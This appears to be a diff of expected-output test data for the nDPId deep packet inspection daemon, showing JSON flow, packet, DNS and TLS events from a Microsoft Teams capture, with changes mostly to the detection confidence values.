-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2047,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041686239,"flow_last_seen":1587041686339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1646,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1587041686339,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041686611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041686589,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1587041686659,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1587041686659,"pkt":"\/\/\/\/\/\/\/\/jP5XIzfkCABFAABE9p0AAEAR\/0vAqAFwwKgB\/+EV4RUAME6OU3BvdFVkcDBE2bWZ25IvowABAADKIN8ICP0NzlEBuCwq6R7jWIhweQ=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686889,"flow_last_seen":1587041686889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686889,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1587041686889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686889,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR0nAqAEGKH4JQ+yQAbuMpd1iAAAAALAC\/\/\/7KQAAAgQFtAEDAwUBAQgKMIS\/iwAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1587041686918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686918,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PdhAAGwG3XQofglDwKgBBgG77JCDb8\/fjKXdY6ASIAC\/qwAAAgQFoAEDAwgEAggKUkSG7zCEv4s="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1587041686918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686918,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR1XAqAEGKH4JQ+yQAbuMpd1jg2\/P4IAQEAn+PwAAAQEICjCEv6dSRIbv"} 
-00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687245,"flow_last_seen":1587041687245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687245,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1587041687245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687245,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyRAbt4yq\/kAAAAALAC\/\/\/rWgAAAgQFtAEDAwUBAQgKMITA4AAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2193,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1587041687293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687293,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8EaVAAGwGudU0ck0hwKgBBgG77JHMBk4keMqv5aASIADnTgAAAgQFoAEDAwgEAggKYPR58TCEwOA="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2194,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1587041687293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687293,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyRAbt4yq\/lzAZOJYAQEAkl0AAAAQEICjCEwQ9g9Hnx"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1587041687370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041687370,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF06EAAP8RZK7AqAEGwKgBAdM1ADUAMUK+cAQBAAABAAAAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041687412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687382,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1587041687435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1587041687435,"pkt":"KDc3AG3IEBMx8Tl2CABFAAD6rblAADkRD+LAqAEBwKgBBgA10zUA5gAAcASBgAABAAYAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAHADAAFAAEAAAe+AB8DYXBpBnN0cmVhbQ50cmFmZmljbWFuYWdlcgNuZXQAwDUABQABAAAAPAAJBmV1d2UtMcAMwGAABQABAAAEVQANCmV1d2UtMS1hcGnAQMB1AAUAAQAAACkACwhldXdlLTEtMcAMwI4ABQABAAAAwQApHWFtcy1ldXdlLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwE\/ApQABAAEAAAANAARoKLuX"} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1587041687436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687436,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVUrAqAEGaCi7l+ySAbtvi5oIAAAAALAC\/\/9njAAAAgQFtAEDAwUBAQgKMITBnAAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687466,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8OsBAAGwG7o1oKLuXwKgBBgG77JKBluUGb4uaCaASIADVGwAAAgQFoAEDAwgEAggKAbkbHzCEwZw="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"} 
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 